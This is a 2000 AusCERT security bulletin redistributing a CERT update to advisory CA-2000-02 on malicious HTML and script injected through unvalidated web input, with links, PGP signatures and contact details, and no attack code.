Date: 06 February 2000
References: ESB-2000.230 ESB-2000.327 ESB-2000.330 ESB-2003.0279
Click here for printable version
Click here for PGP verifiable version
-----BEGIN PGP SIGNED MESSAGE-----
===========================================================================
AUSCERT External Security Bulletin Redistribution
ESB-2000.025 -- Update to CERT Advisory CA-2000-02
Malicious HTML Tags Embedded in Client Web Requests
07 February 2000
===========================================================================
The CERT Coordination Centre has released the following update to their
advisory concerning a vulnerability in Web servers that dynamically
generate pages based on unvalidated input from untrustworthy sources.
A web site may inadvertently include malicious HTML tags or script in their
web pages if they are dynamically generated, or if untrusted forms input
included in the page is not properly validated.
This vulnerability may allow web browser users to unintentionally execute
scripts on their local machine written by an attacker, when they follow
untrusted links in web pages, mail messages, or newsgroup postings. Browser
users may also unknowingly execute malicious scripts on their local machine
when viewing dynamically generated pages based on content provided by other
users.
This update clarifies the impact this vulnerability may have on Java.
The original CERT Advisory CA-2000-02 was released by AusCERT as
External Security Bulletin ESB-2000.023.
- --------------------------BEGIN INCLUDED TEXT--------------------
- -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
The CERT Coordination Center has released updates to CERT Advisory
CA-2000-02 and the FAQ About Malicious Web Scripts Redirected by Web
Sites which clarifies the impact this vulnerability has on Java. These
documents are available at
http://www.cert.org/advisories/CA-2000-02.html
http://www.cert.org/tech_tips/malicious_code_FAQ.html
Of special note is the newly-added question about disabling Java,
available at
http://www.cert.org/tech_tips/malicious_code_FAQ.html#java
We encourage you to read this new information carefully.
For additional information about Java, you may also wish to visit
http://java.sun.com/sfaq
Our thanks to James Gosling and Gary Ellison of Java Software, Sun
Microsystems for their help in producing these updates.
- -----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.0
Charset: noconv
iQA/AwUBOJtEM1r9kb5qlZHQEQJfegCeM1YoHHhstmN8I4gMBecd+FsQHd4AoNS+
TeaYF2XzxPb0ijR9PCOFjDER
=u5zM
- -----END PGP SIGNATURE-----
- ---------------------------END INCLUDED TEXT---------------------
This security bulletin is provided as a service to AusCERT's members. As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content. The decision to use any or all of this information is
the responsibility of each user or organisation, and should be done so in
accordance with site policies and procedures.
NOTE: This is only the original release of the security bulletin. It may
not be updated when updates to the original are made. If downloading at
a later date, it is recommended that the bulletin is retrieved directly
from the original authors to ensure that the information is still current.
Contact information for the authors of the original document is included
in the Security Bulletin above. If you have any questions or need further
information, please contact them directly.
Previous advisories and external security bulletins can be retrieved from:
http://www.auscert.org.au/Information/advisories.html
If you believe that your system has been compromised, contact AusCERT or
your representative in FIRST (Forum of Incident Response and Security
Teams).
Internet Email: auscert@auscert.org.au
Facsimile: (07) 3365 7031
Telephone: (07) 3365 4417 (International: +61 7 3365 4417)
AusCERT personnel answer during Queensland business hours
which are GMT+10:00 (AEST).
On call after hours for emergencies.
-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv
Comment: ftp://ftp.auscert.org.au/pub/auscert/AUSCERT_PGP.key
iQCVAwUBOJ/axSh9+71yA2DNAQFArQP9HIiejXTs6cj6xftdvGSPZBpJlkI5z1nZ
zajHnSg81nFUvNgGyw5WS+X7Yx0YzfY1YS3hbW0bHmIhf8OT3Z3r9RV7LZQBk+pO
cM+5CV0svvWJTpQ2doZnjy8/cksNGxWkVRO1l7gQw6dJ3xXUKoYJjwY9C8SJVfrD
bgfg+kcbQ2s=
=DH2k
-----END PGP SIGNATURE-----
|